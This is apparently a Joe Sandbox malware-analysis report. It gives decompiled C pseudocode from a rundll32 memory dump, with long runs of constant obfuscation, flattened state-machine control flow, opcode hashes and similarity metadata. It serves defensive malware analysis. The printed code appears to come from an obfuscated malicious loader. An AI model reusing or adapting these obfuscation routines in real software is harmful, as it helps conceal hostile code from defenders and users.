                                                                                                                                    				 *(_t321 + 0x20) =  *(_t321 + 0x20) | 0x247001dc;
                                                                                                                                    				_t262 = 0x40ff1a8;
                                                                                                                                    				 *(_t321 + 0x30) =  *(_t321 + 0x20) * 0xb;
                                                                                                                                    				 *(_t321 + 0x30) =  *(_t321 + 0x30) ^ 0x96ee7e42;
                                                                                                                                    				 *(_t321 + 0x14) = 0x97563a;
                                                                                                                                    				 *(_t321 + 0x14) =  *(_t321 + 0x14) + 0xa3ba;
                                                                                                                                    				 *(_t321 + 0x14) =  *(_t321 + 0x14) + 0x7434;
                                                                                                                                    				_t309 = 0x68;
                                                                                                                                    				 *(_t321 + 0x18) =  *(_t321 + 0x14) / _t309;
                                                                                                                                    				 *(_t321 + 0x18) =  *(_t321 + 0x18) ^ 0x000fa3ad;
                                                                                                                                    				 *(_t321 + 0x54) = 0x46dfd;
                                                                                                                                    				_t310 = 0x22;
                                                                                                                                    				 *(_t321 + 0x54) =  *(_t321 + 0x54) * 0x3f;
                                                                                                                                    				 *(_t321 + 0x54) =  *(_t321 + 0x54) ^ 0x011c0bd3;
                                                                                                                                    				 *(_t321 + 0x50) = 0x65d669;
                                                                                                                                    				 *(_t321 + 0x50) =  *(_t321 + 0x50) >> 4;
                                                                                                                                    				 *(_t321 + 0x50) =  *(_t321 + 0x50) ^ 0x0002663c;
                                                                                                                                    				 *(_t321 + 0x1c) = 0xa5dab8;
                                                                                                                                    				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) * 0x23;
                                                                                                                                    				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) >> 2;
                                                                                                                                    				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) << 0xd;
                                                                                                                                    				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) ^ 0x67379b84;
                                                                                                                                    				 *(_t321 + 0x58) = 0x508bac;
                                                                                                                                    				 *(_t321 + 0x58) =  *(_t321 + 0x58) + 0x81b9;
                                                                                                                                    				 *(_t321 + 0x58) =  *(_t321 + 0x58) ^ 0x005059a5;
                                                                                                                                    				 *(_t321 + 0x38) = 0x6dc462;
                                                                                                                                    				 *(_t321 + 0x38) =  *(_t321 + 0x38) / _t310;
                                                                                                                                    				 *(_t321 + 0x38) =  *(_t321 + 0x38) | 0x03137037;
                                                                                                                                    				 *(_t321 + 0x38) =  *(_t321 + 0x38) ^ 0x03112268;
                                                                                                                                    				 *(_t321 + 0x20) = 0x10f337;
                                                                                                                                    				 *(_t321 + 0x20) =  *(_t321 + 0x20) << 0x10;
                                                                                                                                    				_t311 = 0x7a;
                                                                                                                                    				 *(_t321 + 0x1c) =  *(_t321 + 0x20) * 0x5e;
                                                                                                                                    				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) >> 3;
                                                                                                                                    				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) ^ 0x09c781ed;
                                                                                                                                    				 *(_t321 + 0x28) = 0x5a8e56;
                                                                                                                                    				 *(_t321 + 0x28) =  *(_t321 + 0x28) ^ 0x165ac6ba;
                                                                                                                                    				 *(_t321 + 0x28) =  *(_t321 + 0x28) / _t311;
                                                                                                                                    				 *(_t321 + 0x28) =  *(_t321 + 0x28) >> 6;
                                                                                                                                    				 *(_t321 + 0x28) =  *(_t321 + 0x28) ^ 0x000470dc;
                                                                                                                                    				 *(_t321 + 0x40) = 0x558325;
                                                                                                                                    				 *(_t321 + 0x40) =  *(_t321 + 0x40) | 0xb8e268f7;
                                                                                                                                    				 *(_t321 + 0x40) =  *(_t321 + 0x40) + 0x4ee7;
                                                                                                                                    				 *(_t321 + 0x40) =  *(_t321 + 0x40) ^ 0xb8f7e628;
                                                                                                                                    				 *(_t321 + 0x3c) = 0x76576d;
                                                                                                                                    				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) << 1;
                                                                                                                                    				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) + 0xffff05d8;
                                                                                                                                    				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) ^ 0x00efc885;
                                                                                                                                    				 *(_t321 + 0x38) = 0x7fcfc;
                                                                                                                                    				 *(_t321 + 0x38) =  *(_t321 + 0x38) >> 4;
                                                                                                                                    				 *(_t321 + 0x38) =  *(_t321 + 0x38) * 0x1e;
                                                                                                                                    				 *(_t321 + 0x38) =  *(_t321 + 0x38) ^ 0x0005448a;
                                                                                                                                    				 *(_t321 + 0x58) = 0x685aea;
                                                                                                                                    				 *(_t321 + 0x58) =  *(_t321 + 0x58) | 0x7e49cfb4;
                                                                                                                                    				 *(_t321 + 0x58) =  *(_t321 + 0x58) ^ 0x7e6c4597;
                                                                                                                                    				 *(_t321 + 0x24) = 0x2cb25b;
                                                                                                                                    				 *(_t321 + 0x24) =  *(_t321 + 0x24) | 0x98b89101;
                                                                                                                                    				 *(_t321 + 0x24) =  *(_t321 + 0x24) + 0x99b1;
                                                                                                                                    				 *(_t321 + 0x24) =  *(_t321 + 0x24) << 5;
                                                                                                                                    				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x17a3ab17;
                                                                                                                                    				 *(_t321 + 0x20) = 0x5c4f5f;
                                                                                                                                    				_t312 = 0x75;
                                                                                                                                    				_t306 =  *(_t321 + 0x70);
                                                                                                                                    				 *(_t321 + 0x24) =  *(_t321 + 0x20) * 0x3b;
                                                                                                                                    				_t319 =  *(_t321 + 0x70);
                                                                                                                                    				 *(_t321 + 0x24) =  *(_t321 + 0x24) / _t312;
                                                                                                                                    				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x3b5669b3;
                                                                                                                                    				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x3b72ed3d;
                                                                                                                                    				 *(_t321 + 0x48) = 0x281dd4;
                                                                                                                                    				 *(_t321 + 0x48) =  *(_t321 + 0x48) >> 8;
                                                                                                                                    				 *(_t321 + 0x48) =  *(_t321 + 0x48) + 0xfffffe89;
                                                                                                                                    				 *(_t321 + 0x48) =  *(_t321 + 0x48) ^ 0x000ef8bb;
                                                                                                                                    				 *(_t321 + 0x60) = 0x5ec984;
                                                                                                                                    				 *(_t321 + 0x60) =  *(_t321 + 0x60) + 0xefe6;
                                                                                                                                    				 *(_t321 + 0x60) =  *(_t321 + 0x60) ^ 0x00516114;
                                                                                                                                    				 *(_t321 + 0x4c) = 0xbf15d9;
                                                                                                                                    				_t313 = 0x6c;
                                                                                                                                    				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) / _t313;
                                                                                                                                    				_t314 = 0x6b;
                                                                                                                                    				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) / _t314;
                                                                                                                                    				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) ^ 0x000706ff;
                                                                                                                                    				 *(_t321 + 0x30) = 0x4468c3;
                                                                                                                                    				_t315 = 0x7e;
                                                                                                                                    				 *(_t321 + 0x2c) =  *(_t321 + 0x30) * 0x39;
                                                                                                                                    				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) / _t315;
                                                                                                                                    				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) * 0x49;
                                                                                                                                    				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) ^ 0x08d90aee;
                                                                                                                                    				while(1) {
                                                                                                                                    					L1:
                                                                                                                                    					_t292 =  *0x2e3e08; // 0x0
                                                                                                                                    					while(1) {
                                                                                                                                    						L2:
                                                                                                                                    						_t237 =  *(_t321 + 0x60);
                                                                                                                                    						L3:
                                                                                                                                    						while(_t262 != 0x160fcc4) {
                                                                                                                                    							if(_t262 == 0x26954f0) {
                                                                                                                                    								 *_t237 = _t319;
                                                                                                                                    								_t262 = 0xfeff895;
                                                                                                                                    								 *_t292 =  *_t292 + 1;
                                                                                                                                    								_t237 = _t319;
                                                                                                                                    								 *(_t321 + 0x60) = _t237;
                                                                                                                                    								continue;
                                                                                                                                    							} else {
                                                                                                                                    								if(_t262 == 0x40ff1a8) {
                                                                                                                                    									_t179 = _t292 + 0x20; // 0x20
                                                                                                                                    									_t237 = _t179;
                                                                                                                                    									_t262 = 0x5ead19b;
                                                                                                                                    									 *(_t321 + 0x60) = _t237;
                                                                                                                                    									continue;
                                                                                                                                    								} else {
                                                                                                                                    									if(_t262 == 0x58e8483) {
                                                                                                                                    										_push(_t262);
                                                                                                                                    										_push(_t262);
                                                                                                                                    										_t302 = 0x40;
                                                                                                                                    										_t319 = E002C7FF2(_t302);
                                                                                                                                    										__eflags = _t319;
                                                                                                                                    										if(__eflags == 0) {
                                                                                                                                    											goto L20;
                                                                                                                                    										} else {
                                                                                                                                    											_t262 = 0x160fcc4;
                                                                                                                                    											goto L1;
                                                                                                                                    										}
                                                                                                                                    									} else {
                                                                                                                                    										if(_t262 == 0x5ead19b) {
                                                                                                                                    											_t255 = E002D7BA6(_t321 + 0x6c,  *(_t321 + 0x38), __eflags,  *(_t321 + 0x18), 0x2e3000);
                                                                                                                                    											 *(_t321 + 0x70) = _t255;
                                                                                                                                    											_t306 = _t255;
                                                                                                                                    											 *((intOrPtr*)(_t321 + 0x68)) = _t255 +  *((intOrPtr*)(_t321 + 0x68));
                                                                                                                                    											_t262 = 0x58e8483;
                                                                                                                                    											while(1) {
                                                                                                                                    												L1:
                                                                                                                                    												_t292 =  *0x2e3e08; // 0x0
                                                                                                                                    												goto L2;
                                                                                                                                    											}
                                                                                                                                    										} else {
                                                                                                                                    											if(_t262 == 0xd41016e) {
                                                                                                                                    												E002D8519( *(_t321 + 0x4c),  *(_t321 + 0x2c),  *((intOrPtr*)(_t321 + 0x6c)));
                                                                                                                                    												L20:
                                                                                                                                    												_t292 =  *0x2e3e08; // 0x0
                                                                                                                                    											} else {
                                                                                                                                    												if(_t262 != 0xfeff895) {
                                                                                                                                    													L17:
                                                                                                                                    													__eflags = _t262 - 0x20f61b3;
                                                                                                                                    													if(__eflags != 0) {
                                                                                                                                    														L2:
                                                                                                                                    														_t237 =  *(_t321 + 0x60);
                                                                                                                                    														continue;
                                                                                                                                    													}
                                                                                                                                    												} else {
                                                                                                                                    													asm("sbb ecx, ecx");
                                                                                                                                    													_t262 = (_t262 & 0xf84d8315) + 0xd41016e;
                                                                                                                                    													continue;
                                                                                                                                    												}
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    							 *(_t292 + 0x14) =  *(_t292 + 0x14) & 0x00000000;
                                                                                                                                    							 *((intOrPtr*)(_t292 + 4)) =  *(_t292 + 0x20);
                                                                                                                                    							__eflags = 1;
                                                                                                                                    							return 1;
                                                                                                                                    						}
                                                                                                                                    						_push( *(_t321 + 0x1c));
                                                                                                                                    						_push( *(_t321 + 0x38));
                                                                                                                                    						 *((char*)(_t321 + 0x1b)) =  *((intOrPtr*)(_t306 + 1));
                                                                                                                                    						 *((char*)(_t321 + 0x1a)) =  *((intOrPtr*)(_t306 + 2));
                                                                                                                                    						E002D1652( *(_t321 + 0x70), __eflags,  *(_t321 + 0x47) & 0x000000ff,  *(_t321 + 0x26) & 0x000000ff,  *((intOrPtr*)(_t321 + 0x68)),  *(_t321 + 0x60), E002DDCF7( *((intOrPtr*)(_t321 + 0x5c)), 0x2c1590, __eflags), 0x10, _t319 + 0x1c,  *(_t321 + 0x70),  *(_t306 + 3) & 0x000000ff,  *((intOrPtr*)(_t321 + 0x34)),  *(_t306 + 3) & 0x000000ff,  *(_t321 + 0x28));
                                                                                                                                    						E002CA8B0( *((intOrPtr*)(_t321 + 0x80)), _t240,  *((intOrPtr*)(_t321 + 0x94)));
                                                                                                                                    						_t321 = _t321 + 0x3c;
                                                                                                                                    						 *(_t319 + 0x1a) = ( *(_t306 + 4) & 0x000000ff) << 0x00000008 |  *(_t306 + 5) & 0x000000ff;
                                                                                                                                    						_t246 =  *((intOrPtr*)(_t306 + 6));
                                                                                                                                    						_t269 =  *((intOrPtr*)(_t306 + 7));
                                                                                                                                    						_t306 = _t306 + 8;
                                                                                                                                    						_t262 = 0x26954f0;
                                                                                                                                    						_t301 = (_t246 & 0x000000ff) << 0x00000008 | _t269 & 0x000000ff;
                                                                                                                                    						__eflags = _t301;
                                                                                                                                    						 *(_t319 + 0x18) = _t301;
                                                                                                                                    						_t292 =  *0x2e3e08; // 0x0
                                                                                                                                    						goto L17;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    			}





















                                                                                                                                    0x002e12dc
                                                                                                                                    0x002e131e
                                                                                                                                    0x002e1333
                                                                                                                                    0x002e133c
                                                                                                                                    0x002e134a
                                                                                                                                    0x002e134e
                                                                                                                                    0x002e1351
                                                                                                                                    0x002e1354
                                                                                                                                    0x002e1361
                                                                                                                                    0x002e1366
                                                                                                                                    0x002e1366
                                                                                                                                    0x002e1369
                                                                                                                                    0x002e136d
                                                                                                                                    0x00000000
                                                                                                                                    0x002e136d
                                                                                                                                    0x002e11d7

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4t$=r;$_O\$mWv$N$Zh
                                                                                                                                    • API String ID: 0-2036408213
                                                                                                                                    • Opcode ID: 2db2dbd851ef3213d5997ee2a31252e14567f11899aea85506688684fae1f831
                                                                                                                                    • Instruction ID: 8de0efa73a81fe4f78df9eda65366e3ea37d1638e6aab710aec66ab1c293393a
                                                                                                                                    • Opcode Fuzzy Hash: 2db2dbd851ef3213d5997ee2a31252e14567f11899aea85506688684fae1f831
                                                                                                                                    • Instruction Fuzzy Hash: D2C152715183819FC318CF26C48941BBFE1FBC9358F508A1EF69A9A260D3B4D959CF86
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                    			E002DD389(void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                    				intOrPtr _v60;
                                                                                                                                    				char _v68;
                                                                                                                                    				char _v72;
                                                                                                                                    				signed int _v76;
                                                                                                                                    				signed int _v80;
                                                                                                                                    				signed int _v84;
                                                                                                                                    				signed int _v88;
                                                                                                                                    				signed int _v92;
                                                                                                                                    				signed int _v96;
                                                                                                                                    				signed int _v100;
                                                                                                                                    				signed int _v104;
                                                                                                                                    				signed int _v108;
                                                                                                                                    				signed int _v112;
                                                                                                                                    				signed int _v116;
                                                                                                                                    				signed int _v120;
                                                                                                                                    				signed int _v124;
                                                                                                                                    				signed int _v128;
                                                                                                                                    				signed int _v132;
                                                                                                                                    				signed int _v136;
                                                                                                                                    				signed int _v140;
                                                                                                                                    				signed int _v144;
                                                                                                                                    				signed int _v148;
                                                                                                                                    				signed int _v152;
                                                                                                                                    				signed int _v156;
                                                                                                                                    				signed int _v160;
                                                                                                                                    				signed int _v164;
                                                                                                                                    				signed int _v168;
                                                                                                                                    				void* __ecx;
                                                                                                                                    				char _t245;
                                                                                                                                    				void* _t263;
                                                                                                                                    				signed int _t272;
                                                                                                                                    				signed int _t273;
                                                                                                                                    				signed int _t274;
                                                                                                                                    				signed int _t275;
                                                                                                                                    				signed int _t276;
                                                                                                                                    				signed int _t277;
                                                                                                                                    				void* _t280;
                                                                                                                                    				void* _t306;
                                                                                                                                    				intOrPtr _t307;
                                                                                                                                    				char _t308;
                                                                                                                                    				signed int* _t311;
                                                                                                                                    
                                                                                                                                    				_push(_a28);
                                                                                                                                    				_t306 = __edx;
                                                                                                                                    				_push(_a24);
                                                                                                                                    				_push(0);
                                                                                                                                    				_push(_a16);
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_push(0);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				_t245 = E002D20B9(0);
                                                                                                                                    				_v72 = _t245;
                                                                                                                                    				_t311 =  &(( &_v168)[9]);
                                                                                                                                    				_v84 = 0xd8cd3;
                                                                                                                                    				_t307 = _t245;
                                                                                                                                    				_v84 = _v84 ^ 0x2f0b54cb;
                                                                                                                                    				_v84 = _v84 ^ 0x2f06dc18;
                                                                                                                                    				_t280 = 0xd3d1227;
                                                                                                                                    				_v116 = 0xdf2f98;
                                                                                                                                    				_v116 = _v116 >> 4;
                                                                                                                                    				_v116 = _v116 | 0xd629951a;
                                                                                                                                    				_v116 = _v116 ^ 0xd62df7db;
                                                                                                                                    				_v120 = 0x9d2532;
                                                                                                                                    				_v120 = _v120 | 0x60368432;
                                                                                                                                    				_v120 = _v120 << 1;
                                                                                                                                    				_v120 = _v120 ^ 0xc1706bd2;
                                                                                                                                    				_v104 = 0x3ed100;
                                                                                                                                    				_v104 = _v104 >> 0xd;
                                                                                                                                    				_v104 = _v104 << 0x10;
                                                                                                                                    				_v104 = _v104 ^ 0x01fb42fe;
                                                                                                                                    				_v132 = 0xac3ff1;
                                                                                                                                    				_v132 = _v132 << 1;
                                                                                                                                    				_v132 = _v132 ^ 0x8b709814;
                                                                                                                                    				_v132 = _v132 + 0xffff5c55;
                                                                                                                                    				_v132 = _v132 ^ 0x8a223f6b;
                                                                                                                                    				_v164 = 0xc1955c;
                                                                                                                                    				_v164 = _v164 + 0xe851;
                                                                                                                                    				_v164 = _v164 >> 5;
                                                                                                                                    				_t272 = 0x7c;
                                                                                                                                    				_v164 = _v164 / _t272;
                                                                                                                                    				_v164 = _v164 ^ 0x000d6983;
                                                                                                                                    				_v76 = 0x371de3;
                                                                                                                                    				_v76 = _v76 >> 1;
                                                                                                                                    				_v76 = _v76 ^ 0x00157680;
                                                                                                                                    				_v156 = 0xc7985;
                                                                                                                                    				_v156 = _v156 + 0xffff997a;
                                                                                                                                    				_v156 = _v156 + 0x5493;
                                                                                                                                    				_v156 = _v156 ^ 0xa8ab967c;
                                                                                                                                    				_v156 = _v156 ^ 0xa8a621f4;
                                                                                                                                    				_v92 = 0xd6ada;
                                                                                                                                    				_v92 = _v92 + 0xf102;
                                                                                                                                    				_v92 = _v92 ^ 0x00049005;
                                                                                                                                    				_v152 = 0xbb1df2;
                                                                                                                                    				_t273 = 0x71;
                                                                                                                                    				_v152 = _v152 * 0x37;
                                                                                                                                    				_v152 = _v152 << 2;
                                                                                                                                    				_v152 = _v152 + 0x7572;
                                                                                                                                    				_v152 = _v152 ^ 0xa0c338c0;
                                                                                                                                    				_v108 = 0xfb68a6;
                                                                                                                                    				_v108 = _v108 / _t273;
                                                                                                                                    				_v108 = _v108 * 0x38;
                                                                                                                                    				_v108 = _v108 ^ 0x00745d8a;
                                                                                                                                    				_v160 = 0x9cfb41;
                                                                                                                                    				_v160 = _v160 >> 0xd;
                                                                                                                                    				_v160 = _v160 + 0xffff2425;
                                                                                                                                    				_v160 = _v160 | 0xc56bf860;
                                                                                                                                    				_v160 = _v160 ^ 0xffffb927;
                                                                                                                                    				_v100 = 0xcc3697;
                                                                                                                                    				_v100 = _v100 << 9;
                                                                                                                                    				_t274 = 0x3d;
                                                                                                                                    				_v100 = _v100 / _t274;
                                                                                                                                    				_v100 = _v100 ^ 0x027f162e;
                                                                                                                                    				_v124 = 0x5e8102;
                                                                                                                                    				_v124 = _v124 << 1;
                                                                                                                                    				_v124 = _v124 >> 4;
                                                                                                                                    				_v124 = _v124 ^ 0x000928e5;
                                                                                                                                    				_v96 = 0x9a5083;
                                                                                                                                    				_v96 = _v96 + 0xffff88fb;
                                                                                                                                    				_v96 = _v96 | 0x7e2ee754;
                                                                                                                                    				_v96 = _v96 ^ 0x7eb15945;
                                                                                                                                    				_v168 = 0x417f4c;
                                                                                                                                    				_v168 = _v168 + 0x30ef;
                                                                                                                                    				_v168 = _v168 + 0xffff0fcf;
                                                                                                                                    				_v168 = _v168 | 0x766f950c;
                                                                                                                                    				_v168 = _v168 ^ 0x7667a907;
                                                                                                                                    				_v148 = 0xeb5ea2;
                                                                                                                                    				_v148 = _v148 >> 1;
                                                                                                                                    				_v148 = _v148 | 0xdbfe62fd;
                                                                                                                                    				_v148 = _v148 ^ 0xdbf81284;
                                                                                                                                    				_v88 = 0xc982d2;
                                                                                                                                    				_v88 = _v88 | 0xbf502ba4;
                                                                                                                                    				_v88 = _v88 ^ 0xbfda3d08;
                                                                                                                                    				_v80 = 0x51a7e7;
                                                                                                                                    				_v80 = _v80 | 0xcf4b4eb1;
                                                                                                                                    				_v80 = _v80 ^ 0xcf5d8599;
                                                                                                                                    				_v140 = 0x112038;
                                                                                                                                    				_v140 = _v140 >> 0xc;
                                                                                                                                    				_v140 = _v140 | 0x79e3f6d0;
                                                                                                                                    				_v140 = _v140 >> 0xc;
                                                                                                                                    				_v140 = _v140 ^ 0x000d6368;
                                                                                                                                    				_v144 = 0x3c4be1;
                                                                                                                                    				_v144 = _v144 << 1;
                                                                                                                                    				_t275 = 0x51;
                                                                                                                                    				_v144 = _v144 / _t275;
                                                                                                                                    				_t276 = 0x44;
                                                                                                                                    				_v144 = _v144 / _t276;
                                                                                                                                    				_v144 = _v144 ^ 0x0006a926;
                                                                                                                                    				_v112 = 0xebe610;
                                                                                                                                    				_t277 = 6;
                                                                                                                                    				_v112 = _v112 / _t277;
                                                                                                                                    				_v112 = _v112 ^ 0x8e2a0175;
                                                                                                                                    				_v112 = _v112 ^ 0x8e0783c0;
                                                                                                                                    				_v128 = 0x507b99;
                                                                                                                                    				_v128 = _v128 ^ 0xb6dd86a4;
                                                                                                                                    				_v128 = _v128 + 0xffff6e9b;
                                                                                                                                    				_v128 = _v128 * 0x6f;
                                                                                                                                    				_v128 = _v128 ^ 0x275b8ca8;
                                                                                                                                    				_v136 = 0x1b49e9;
                                                                                                                                    				_v136 = _v136 * 0x22;
                                                                                                                                    				_v136 = _v136 ^ 0x6bc19a50;
                                                                                                                                    				_v136 = _v136 ^ 0xda04c504;
                                                                                                                                    				_v136 = _v136 ^ 0xb25c1cc6;
                                                                                                                                    				do {
                                                                                                                                    					while(_t280 != 0x9b6c7ef) {
                                                                                                                                    						if(_t280 == 0xd3d1227) {
                                                                                                                                    							_t280 = 0x9b6c7ef;
                                                                                                                                    							continue;
                                                                                                                                    						} else {
                                                                                                                                    							if(_t280 == 0xd8aa277) {
                                                                                                                                    								E002D9008(_v72, _v128, _v136);
                                                                                                                                    							} else {
                                                                                                                                    								_t317 = _t280 - 0xdb35d55;
                                                                                                                                    								if(_t280 != 0xdb35d55) {
                                                                                                                                    									goto L10;
                                                                                                                                    								} else {
                                                                                                                                    									_push(_v164);
                                                                                                                                    									_push(_v132);
                                                                                                                                    									_t308 = 0x44;
                                                                                                                                    									E002C4B61( &_v68, _t308);
                                                                                                                                    									_push(_v92);
                                                                                                                                    									_v68 = _t308;
                                                                                                                                    									_push(_v156);
                                                                                                                                    									_t284 = _v76;
                                                                                                                                    									_v60 = E002DDCF7(_v76, 0x2c173c, _t317);
                                                                                                                                    									_t307 = E002DDE10( &_v68, _v152, _t306, _v116 | _v84, _v76, _a12, _v108, 0, _a28, _v160, _v72, _v100, _v124, _v96, _t284, _t284, _v168, _v148, _t284, _v88, _v80, _v140);
                                                                                                                                    									E002CA8B0(_v144, _v60, _v112);
                                                                                                                                    									_t311 =  &(_t311[0x19]);
                                                                                                                                    									_t280 = 0xd8aa277;
                                                                                                                                    									continue;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						L13:
                                                                                                                                    						return _t307;
                                                                                                                                    					}
                                                                                                                                    					_t263 = E002C4241(_t280, _v120,  &_v72, _a28, _v104);
                                                                                                                                    					_t311 =  &(_t311[3]);
                                                                                                                                    					__eflags = _t263;
                                                                                                                                    					if(_t263 == 0) {
                                                                                                                                    						_t280 = 0xcb447d9;
                                                                                                                                    						goto L10;
                                                                                                                                    					} else {
                                                                                                                                    						_t280 = 0xdb35d55;
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					goto L13;
                                                                                                                                    					L10:
                                                                                                                                    					__eflags = _t280 - 0xcb447d9;
                                                                                                                                    				} while (_t280 != 0xcb447d9);
                                                                                                                                    				goto L13;
                                                                                                                                    			}













































                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: T.~$hc$ru$($0$K<
                                                                                                                                    • API String ID: 0-2343433060
                                                                                                                                    • Opcode ID: f53d4d9fd4be603d1fc18c50edf409dc9df1bc507893f0d1be231544bcbe9fcb
                                                                                                                                    • Instruction ID: f339f5687814e8daf620e0cb80bd7baa8fca70f684ae56548fe4b5941dc2d4ed
                                                                                                                                    • Opcode Fuzzy Hash: f53d4d9fd4be603d1fc18c50edf409dc9df1bc507893f0d1be231544bcbe9fcb
                                                                                                                                    • Instruction Fuzzy Hash: 69C122725187809FD768CF61C986A5BFBE1FBD5708F104A1DF29A96260C7B28918CF43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 97%
                                                                                                                                    			E002C3E3F() {
                                                                                                                                    				signed int _v4;
                                                                                                                                    				intOrPtr _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				char _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				signed int _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				signed int _v72;
                                                                                                                                    				signed int _v76;
                                                                                                                                    				signed int _v80;
                                                                                                                                    				signed int _v84;
                                                                                                                                    				signed int _v88;
                                                                                                                                    				signed int _v92;
                                                                                                                                    				signed int _v96;
                                                                                                                                    				signed int _v100;
                                                                                                                                    				void* _t213;
                                                                                                                                    				signed int _t214;
                                                                                                                                    				void* _t216;
                                                                                                                                    				signed int _t222;
                                                                                                                                    				intOrPtr _t223;
                                                                                                                                    				signed int _t224;
                                                                                                                                    				signed int _t225;
                                                                                                                                    				signed int _t226;
                                                                                                                                    				signed int _t227;
                                                                                                                                    				signed int _t228;
                                                                                                                                    				signed int _t229;
                                                                                                                                    				void* _t230;
                                                                                                                                    				void* _t236;
                                                                                                                                    				void* _t257;
                                                                                                                                    				signed int* _t261;
                                                                                                                                    
                                                                                                                                    				_t261 =  &_v100;
                                                                                                                                    				_v8 = 0xc74bd8;
                                                                                                                                    				_v4 = 0;
                                                                                                                                    				_v72 = 0x3d4417;
                                                                                                                                    				_v72 = _v72 << 8;
                                                                                                                                    				_v72 = _v72 + 0xffff33fd;
                                                                                                                                    				_v72 = _v72 ^ 0xbd434afc;
                                                                                                                                    				_v32 = 0xa9ac19;
                                                                                                                                    				_v32 = _v32 + 0x4aca;
                                                                                                                                    				_v32 = _v32 ^ 0x00a9f6e1;
                                                                                                                                    				_v40 = 0x1f6a8;
                                                                                                                                    				_v12 = 0;
                                                                                                                                    				_v40 = _v40 * 0x6f;
                                                                                                                                    				_t257 = 0xf52a3f4;
                                                                                                                                    				_v40 = _v40 ^ 0x00d19880;
                                                                                                                                    				_v44 = 0x168b17;
                                                                                                                                    				_v44 = _v44 + 0x13a5;
                                                                                                                                    				_v44 = _v44 ^ 0x001ee95f;
                                                                                                                                    				_v48 = 0xfac2ed;
                                                                                                                                    				_v48 = _v48 + 0xffff2a35;
                                                                                                                                    				_v48 = _v48 ^ 0x00fbd9f9;
                                                                                                                                    				_v92 = 0xc00c53;
                                                                                                                                    				_v92 = _v92 + 0xffff1aa9;
                                                                                                                                    				_v92 = _v92 + 0xf2d7;
                                                                                                                                    				_t225 = 0x68;
                                                                                                                                    				_v92 = _v92 / _t225;
                                                                                                                                    				_v92 = _v92 ^ 0x0000565c;
                                                                                                                                    				_v68 = 0xf2ac97;
                                                                                                                                    				_v68 = _v68 ^ 0x99fc0549;
                                                                                                                                    				_v68 = _v68 >> 0xf;
                                                                                                                                    				_v68 = _v68 ^ 0x000a8804;
                                                                                                                                    				_v24 = 0xf89d13;
                                                                                                                                    				_t226 = 0x49;
                                                                                                                                    				_v24 = _v24 / _t226;
                                                                                                                                    				_v24 = _v24 ^ 0x000ed122;
                                                                                                                                    				_v96 = 0x9976f7;
                                                                                                                                    				_v96 = _v96 >> 0xe;
                                                                                                                                    				_v96 = _v96 ^ 0xdd1af6ea;
                                                                                                                                    				_v96 = _v96 ^ 0x684d855d;
                                                                                                                                    				_v96 = _v96 ^ 0xb5551d4c;
                                                                                                                                    				_v28 = 0x12a2d6;
                                                                                                                                    				_t227 = 0xe;
                                                                                                                                    				_v28 = _v28 * 0x29;
                                                                                                                                    				_v28 = _v28 ^ 0x02ffade5;
